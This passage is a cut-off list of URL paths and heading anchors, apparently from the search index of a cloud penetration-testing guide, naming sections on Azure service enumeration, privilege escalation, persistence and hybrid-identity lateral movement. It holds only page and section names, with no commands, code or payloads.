strative-units","pentesting-cloud/azure-security/az-services/az-azuread.html#entra-id-privilege-escalation","pentesting-cloud/azure-security/az-services/az-azuread.html#azure-privilege-escalation","pentesting-cloud/azure-security/az-services/az-azuread.html#defensive-mechanisms","pentesting-cloud/azure-security/az-services/az-azuread.html#privileged-identity-management-pim","pentesting-cloud/azure-security/az-services/az-azuread.html#conditional-access-policies","pentesting-cloud/azure-security/az-services/az-azuread.html#entra-identity-protection","pentesting-cloud/azure-security/az-services/az-azuread.html#entra-password-protection","pentesting-cloud/azure-security/az-services/az-azuread.html#references","pentesting-cloud/azure-security/az-services/az-acr.html#az---acr","pentesting-cloud/azure-security/az-services/az-acr.html#basic-information","pentesting-cloud/azure-security/az-services/az-acr.html#enumerate","pentesting-cloud/azure-security/az-services/az-application-proxy.html#az---application-proxy","pentesting-cloud/azure-security/az-services/az-application-proxy.html#basic-information","pentesting-cloud/azure-security/az-services/az-application-proxy.html#enumeration","pentesting-cloud/azure-security/az-services/az-application-proxy.html#references","pentesting-cloud/azure-security/az-services/az-arm-templates.html#az---arm-templates--deployments","pentesting-cloud/azure-security/az-services/az-arm-templates.html#basic-information","pentesting-cloud/azure-security/az-services/az-arm-templates.html#history","pentesting-cloud/azure-security/az-services/az-arm-templates.html#search-sensitive-info","pentesting-cloud/azure-security/az-services/az-arm-templates.html#references","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#az---automation-accounts","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#basic-information","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#settings","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#runbooks--jobs","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#schedules--webhooks","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#source-control","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#runtime-environments","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#hybrid-worker-groups","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#state-configuration-sc","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#enumeration","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#privilege-escalation--post-exploitation","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#persistence","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#references","pentesting-cloud/azure-security/az-services/az-app-services.html#az---app-services","pentesting-cloud/azure-security/az-services/az-app-services.html#app-service-basic-information","pentesting-cloud/azure-security/az-services/az-app-services.html#basic-authentication","pentesting-cloud/azure-security/az-services/az-app-services.html#kudu","pentesting-cloud/azure-security/az-services/az-app-services.html#sources","pentesting-cloud/azure-security/az-services/az-app-services.html#webjobs","pentesting-cloud/azure-security/az-services/az-app-services.html#slots","pentesting-cloud/azure-security/az-services/az-app-services.html#azure-function-apps","pentesting-cloud/azure-security/az-services/az-app-services.html#enumeration","pentesting-cloud/azure-security/az-services/az-app-services.html#examples-to-generate-web-apps","pentesting-cloud/azure-security/az-services/az-app-services.html#python-from-local","pentesting-cloud/azure-security/az-services/az-app-services.html#python-from-github","pentesting-cloud/azure-security/az-services/az-app-services.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-app-services.html#references","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#az---cloud-shell","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#azure-cloud-shell","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#key-features","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#cloud-shell-phishing","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#find--forbid-cloud-shell-automatic-storage-accounts","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#persistence","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#references","pentesting-cloud/azure-security/az-services/az-container-registry.html#az---container-registry","pentesting-cloud/azure-security/az-services/az-container-registry.html#basic-information","pentesting-cloud/azure-security/az-services/az-container-registry.html#permissions","pentesting-cloud/azure-security/az-services/az-container-registry.html#authentication","pentesting-cloud/azure-security/az-services/az-container-registry.html#encryption","pentesting-cloud/azure-security/az-services/az-container-registry.html#networking","pentesting-cloud/azure-security/az-services/az-container-registry.html#microsoft-defender-for-cloud","pentesting-cloud/azure-security/az-services/az-container-registry.html#soft-delete","pentesting-cloud/azure-security/az-services/az-container-registry.html#webhooks","pentesting-cloud/azure-security/az-services/az-container-registry.html#connected-registries","pentesting-cloud/azure-security/az-services/az-container-registry.html#runs--tasks","pentesting-cloud/azure-security/az-services/az-container-registry.html#cache","pentesting-cloud/azure-security/az-services/az-container-registry.html#enumeration","pentesting-cloud/azure-security/az-services/az-container-registry.html#unauthenticated-access","pentesting-cloud/azure-security/az-services/az-container-registry.html#privilege-escalation--post-exploitation","pentesting-cloud/azure-security/az-services/az-container-registry.html#references","pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#az---container-instances","pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#basic-information","pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#configurations","pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#enumeration","pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#privilege-escalation--post-exploitation","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#az---cosmosdb","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#azure-cosmosdb","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#nosql","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#mongodb","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#references","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#todo","pentesting-cloud/azure-security/az-services/az-defender.html#az---defender","pentesting-cloud/azure-security/az-services/az-defender.html#microsoft-defender-for-cloud","pentesting-cloud/azure-security/az-services/az-defender.html#key-features","pentesting-cloud/azure-security/az-services/az-defender.html#microsoft-defender-easm","pentesting-cloud/azure-security/az-services/az-file-shares.html#az---file-shares","pentesting-cloud/azure-security/az-services/az-file-shares.html#basic-information","pentesting-cloud/azure-security/az-services/az-file-shares.html#access-tiers","pentesting-cloud/azure-security/az-services/az-file-shares.html#backups","pentesting-cloud/azure-security/az-services/az-file-shares.html#supported-authentications-via-smb","pentesting-cloud/azure-security/az-services/az-file-shares.html#supported-authentication-via-nfs","pentesting-cloud/azure-security/az-services/az-file-shares.html#enumeration","pentesting-cloud/azure-security/az-services/az-file-shares.html#connection","pentesting-cloud/azure-security/az-services/az-file-shares.html#regular-storage-enumeration-access-keys-sas","pentesting-cloud/azure-security/az-services/az-file-shares.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-file-shares.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-file-shares.html#persistence","pentesting-cloud/azure-security/az-services/az-front-door.html#az---file-shares","pentesting-cloud/azure-security/az-services/az-front-door.html#remoteaddr-bypass","pentesting-cloud/azure-security/az-services/az-front-door.html#references","pentesting-cloud/azure-security/az-services/az-function-apps.html#az---function-apps","pentesting-cloud/azure-security/az-services/az-function-apps.html#basic-information","pentesting-cloud/azure-security/az-services/az-function-apps.html#different-plans","pentesting-cloud/azure-security/az-services/az-function-apps.html#storage-buckets","pentesting-cloud/azure-security/az-services/az-function-apps.html#networking","pentesting-cloud/azure-security/az-services/az-function-apps.html#function-app-settings--environment-variables","pentesting-cloud/azure-security/az-services/az-function-apps.html#function-sandbox","pentesting-cloud/azure-security/az-services/az-function-apps.html#managed-identities--metadata","pentesting-cloud/azure-security/az-services/az-function-apps.html#access-keys","pentesting-cloud/azure-security/az-services/az-function-apps.html#basic-authentication","pentesting-cloud/azure-security/az-services/az-function-apps.html#github-based-deployments","pentesting-cloud/azure-security/az-services/az-function-apps.html#container-based-deployments","pentesting-cloud/azure-security/az-services/az-function-apps.html#enumeration","pentesting-cloud/azure-security/az-services/az-function-apps.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-function-apps.html#references","pentesting-cloud/azure-security/az-services/intune.html#az---intune","pentesting-cloud/azure-security/az-services/intune.html#basic-information","pentesting-cloud/azure-security/az-services/intune.html#cloud---on-prem","pentesting-cloud/azure-security/az-services/intune.html#references","pentesting-cloud/azure-security/az-services/az-keyvault.html#az---key-vault","pentesting-cloud/azure-security/az-services/az-keyvault.html#basic-information","pentesting-cloud/azure-security/az-services/az-keyvault.html#access-control","pentesting-cloud/azure-security/az-services/az-keyvault.html#key-vault-rbac-built-in-roles","pentesting-cloud/azure-security/az-services/az-keyvault.html#network-access","pentesting-cloud/azure-security/az-services/az-keyvault.html#deletion-protection","pentesting-cloud/azure-security/az-services/az-keyvault.html#enumeration","pentesting-cloud/azure-security/az-services/az-keyvault.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-keyvault.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-logic-apps.html#az---logic-apps","pentesting-cloud/azure-security/az-services/az-logic-apps.html#basic-information","pentesting-cloud/azure-security/az-services/az-logic-apps.html#hosting-options","pentesting-cloud/azure-security/az-services/az-logic-apps.html#single-workflows--consumption-plan","pentesting-cloud/azure-security/az-services/az-logic-apps.html#triggers--actions","pentesting-cloud/azure-security/az-services/az-logic-apps.html#authorization-policies","pentesting-cloud/azure-security/az-services/az-logic-apps.html#access-keys","pentesting-cloud/azure-security/az-services/az-logic-apps.html#workflow-settings--components","pentesting-cloud/azure-security/az-services/az-logic-apps.html#leak-mi-access-tokens","pentesting-cloud/azure-security/az-services/az-logic-apps.html#logic-apps--standard-plan","pentesting-cloud/azure-security/az-services/az-logic-apps.html#differences-with-single-workflows","pentesting-cloud/azure-security/az-services/az-logic-apps.html#enumeration","pentesting-cloud/azure-security/az-services/az-logic-apps.html#integration-accounts","pentesting-cloud/azure-security/az-services/az-logic-apps.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-logic-apps.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-logic-apps.html#persistence","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#az---management-groups-subscriptions--resource-groups","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#management-groups","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#enumeration","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#subscriptions","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#enumeration-1","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#resource-groups","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#enumeration-2","pentesting-cloud/azure-security/az-services/az-misc.html#az---management-groups-subscriptions--resource-groups","pentesting-cloud/azure-security/az-services/az-misc.html#power-apps","pentesting-cloud/azure-security/az-services/az-monitoring.html#az---monitoring","pentesting-cloud/azure-security/az-services/az-monitoring.html#entra-id---logs","pentesting-cloud/azure-security/az-services/az-monitoring.html#entra-id---log-systems","pentesting-cloud/azure-security/az-services/az-monitoring.html#azure-monitor","pentesting-cloud/azure-security/az-services/az-monitoring.html#log-analytics-workspaces","pentesting-cloud/azure-security/az-services/az-monitoring.html#enumeration","pentesting-cloud/azure-security/az-services/az-monitoring.html#entra-id","pentesting-cloud/azure-security/az-services/az-monitoring.html#azure-monitor-1","pentesting-cloud/azure-security/az-services/az-mysql.html#az---mysql-databases","pentesting-cloud/azure-security/az-services/az-mysql.html#azure-mysql","pentesting-cloud/azure-security/az-services/az-mysql.html#security-features","pentesting-cloud/azure-security/az-services/az-mysql.html#enumeration","pentesting-cloud/azure-security/az-services/az-mysql.html#connection","pentesting-cloud/azure-security/az-services/az-mysql.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-mysql.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-mysql.html#todo","pentesting-cloud/azure-security/az-services/az-postgresql.html#az---postgresql-databases","pentesting-cloud/azure-security/az-services/az-postgresql.html#azure-postgresql","pentesting-cloud/azure-security/az-services/az-postgresql.html#key-features","pentesting-cloud/azure-security/az-services/az-postgresql.html#enumeration","pentesting-cloud/azure-security/az-services/az-postgresql.html#connection","pentesting-cloud/azure-security/az-services/az-postgresql.html#references","pentesting-cloud/azure-security/az-services/az-postgresql.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-postgresql.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-postgresql.html#todo","pentesting-cloud/azure-security/az-services/az-queue.html#az---queue-storage","pentesting-cloud/azure-security/az-services/az-queue.html#basic-information","pentesting-cloud/azure-security/az-services/az-queue.html#enumeration","pentesting-cloud/azure-security/az-services/az-queue.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-queue.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-queue.html#persistence","pentesting-cloud/azure-security/az-services/az-queue.html#references","pentesting-cloud/azure-security/az-services/az-sentinel.html#az---defender","pentesting-cloud/azure-security/az-services/az-sentinel.html#microsoft-sentinel","pentesting-cloud/azure-security/az-services/az-sentinel.html#microsoft-sentinel-configuration","pentesting-cloud/azure-security/az-services/az-sentinel.html#main-features","pentesting-cloud/azure-security/az-services/az-servicebus.html#az---service-bus-enum","pentesting-cloud/azure-security/az-services/az-servicebus.html#service-bus","pentesting-cloud/azure-security/az-services/az-servicebus.html#key-concepts","pentesting-cloud/azure-security/az-services/az-servicebus.html#advance-features","pentesting-cloud/azure-security/az-services/az-servicebus.html#local-authentication","pentesting-cloud/azure-security/az-services/az-servicebus.html#authorization-rule--sas-policy","pentesting-cloud/azure-security/az-services/az-servicebus.html#enumeration","pentesting-cloud/azure-security/az-services/az-servicebus.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-servicebus.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-servicebus.html#references","pentesting-cloud/azure-security/az-services/az-sql.html#az---sql","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql","pentesting-cloud/azure-security/az-services/az-sql.html#sql-server-security-features","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql-database","pentesting-cloud/azure-security/az-services/az-sql.html#sql-database-security-features","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql-managed-instance","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql-virtual-machines","pentesting-cloud/azure-security/az-services/az-sql.html#enumeration","pentesting-cloud/azure-security/az-services/az-sql.html#connect-and-run-sql-queries","pentesting-cloud/azure-security/az-services/az-sql.html#references","pentesting-cloud/azure-security/az-services/az-sql.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-sql.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-sql.html#persistence","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#az-static-web-apps","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#static-web-apps-basic-information","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#deployment-authentication","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#web-app-basic-authentication","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#snippets","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#managed-identities","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#enumeration","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#examples-to-generate-web-apps","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#privilege-escalation-and-post-exploitation","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#references","pentesting-cloud/azure-security/az-services/az-storage.html#az---storage-accounts--blobs","pentesting-cloud/azure-security/az-services/az-storage.html#basic-information","pentesting-cloud/azure-security/az-services/az-storage.html#storage-endpoints","pentesting-cloud/azure-security/az-services/az-storage.html#public-exposure","pentesting-cloud/azure-security/az-services/az-storage.html#connect-to-storage","pentesting-cloud/azure-security/az-services/az-storage.html#access-to-storage","pentesting-cloud/azure-security/az-services/az-storage.html#rbac","pentesting-cloud/azure-security/az-services/az-storage.html#access-keys","pentesting-cloud/azure-security/az-services/az-storage.html#shared-keys--lite-shared-keys","pentesting-cloud/azure-security/az-services/az-storage.html#shared-access-signature--sas","pentesting-cloud/azure-security/az-services/az-storage.html#sftp-support-for-azure-blob-storage","pentesting-cloud/azure-security/az-services/az-storage.html#key-features","pentesting-cloud/azure-security/az-services/az-storage.html#setup-requirements","pentesting-cloud/azure-security/az-services/az-storage.html#permissions","pentesting-cloud/azure-security/az-services/az-storage.html#enumeration","pentesting-cloud/azure-security/az-services/az-storage.html#file-shares","pentesting-cloud/azure-security/az-services/az-storage.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-storage.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-storage.html#persistence","pentesting-cloud/azure-security/az-services/az-storage.html#references","pentesting-cloud/azure-security/az-services/az-table-storage.html#az---table-storage","pentesting-cloud/azure-security/az-services/az-table-storage.html#basic-information","pentesting-cloud/azure-security/az-services/az-table-storage.html#keys","pentesting-cloud/azure-security/az-services/az-table-storage.html#enumeration","pentesting-cloud/azure-security/az-services/az-table-storage.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-table-storage.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-table-storage.html#persistence","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#az---virtual-desktop","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#azure-virtual-desktop","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#host-pools","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#session-hosts","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#application-groups","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#workspaces--connections","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#managed-identities","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#enumeration","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#privesc","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#post-exploitation--persistence","pentesting-cloud/azure-security/az-services/vms/index.html#az---virtual-machines--network","pentesting-cloud/azure-security/az-services/vms/index.html#azure-networking-basic-info","pentesting-cloud/azure-security/az-services/vms/index.html#vms-basic-information","pentesting-cloud/azure-security/az-services/vms/index.html#security-configurations","pentesting-cloud/azure-security/az-services/vms/index.html#disks--snapshots","pentesting-cloud/azure-security/az-services/vms/index.html#images-gallery-images--restore-points","pentesting-cloud/azure-security/az-services/vms/index.html#azure-site-recovery","pentesting-cloud/azure-security/az-services/vms/index.html#azure-bastion","pentesting-cloud/azure-security/az-services/vms/index.html#metadata","pentesting-cloud/azure-security/az-services/vms/index.html#vm-enumeration","pentesting-cloud/azure-security/az-services/vms/index.html#code-execution-in-vms","pentesting-cloud/azure-security/az-services/vms/index.html#vm-extensions","pentesting-cloud/azure-security/az-services/vms/index.html#relevant-vm-extensions","pentesting-cloud/azure-security/az-services/vms/index.html#vm-applications","pentesting-cloud/azure-security/az-services/vms/index.html#user-data","pentesting-cloud/azure-security/az-services/vms/index.html#custom-data","pentesting-cloud/azure-security/az-services/vms/index.html#run-command","pentesting-cloud/azure-security/az-services/vms/index.html#privilege-escalation","pentesting-cloud/azure-security/az-services/vms/index.html#unauthenticated-access","pentesting-cloud/azure-security/az-services/vms/index.html#post-exploitation","pentesting-cloud/azure-security/az-services/vms/index.html#persistence","pentesting-cloud/azure-security/az-services/vms/index.html#references","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#az---azure-network","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#basic-information","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#virtual-network-vnet--subnets","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#network-security-groups-nsg","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-1","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-firewall","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-2","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-route-tables","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-3","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-private-link","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-4","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-service-endpoints","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-5","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#differences-between-service-endpoints-and-private-links","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-front-door-afd--afd-waf","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-6","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-application-gateway-and-azure-application-gateway-waf","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-7","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-hub-spoke--vnet-peering","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-8","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#site-to-site-vpn","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-9","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-expressroute","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-10","pentesting-cloud/azure-security/az-permissions-for-a-pentest.html#az---permissions-for-a-pentest","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#az---lateral-movement-cloud---on-prem","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#basic-information","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#pivoting-techniques","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#az---arc-vulnerable-gpo-deploy-script","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#identifying-the-issues","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#exploit","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-kerberos-trust.html#az---cloud-kerberos-trust","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-kerberos-trust.html#kerberos-trust-relationship-overview","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-kerberos-trust.html#pivoting-from-entra-id-to-on-prem-ad","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-kerberos-trust.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.html#az---cloud-sync","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.html#basic-information","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.html#principals-generated","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.html#password-sychronization","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.html#pivoting","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.html#ad----entra-id","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.html#entra-id----ad","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.html#enumeration","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#az---connect-sync","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#basic-information","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#principals-generated","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#synchronize-passwords","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#password-hash-synchronization","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#password-writeback","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#pivoting-ad----entra-id","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#enumerating-connect-sync","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#finding-the-passwords","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#abusing-msol_","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#abusing-connectsyncprovisioning_connectsync_","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#abusing-sync_-deprecated","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#seamless-sso","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#pivoting-entra-id----ad","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.html#az---microsoft-entra-domain-services","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.html#domain-services","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.html#pivoting","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.html#enumeration","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-federation.html#az---federation","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-federation.html#basic-information","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-federation.html#pivoting","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-federation.html#golden-saml","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-federation.html#on-prem---cloud","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-federation.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-hybrid-identity-misc-attacks.html#hybrid-identity-miscellaneous-attacks","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-hybrid-identity-misc-attacks.html#forcing-synchronization-of-entra-id-users-to-on-prem","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-hybrid-identity-misc-attacks.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#az---local-cloud-credentials","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#local-token-storage-and-security-considerations","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#azure-cli-command-line-interface","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#azure-powershell","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#automatic-tools-to-find-them","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#tokens-in-memory","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html#az---pass-the-certificate","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html#pass-the-certificate-azure","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#az---pass-the-cookie","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#why-cookies","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#attack","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#az---primary-refresh-token-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#what-is-a-primary-refresh-token-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#how-does-a-prt-work","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#why-are-prts-powerful","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#how-to-know-if-a-prt-is-present","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#pass-the-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#mimikatz","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#mimikatz--aadinternals","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#mimikatz--roadtx","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#abusing-protected-prts","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#user-level-token-theft-non-admin","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#web-account-manager-wam-apis","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#user-impersonation-and-token-retrieval","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#direct-lsass--token-broker-interaction-advanced","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#phishing-prts","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#why-this-works","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#public-tools-and-proof-of-concepts","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#references",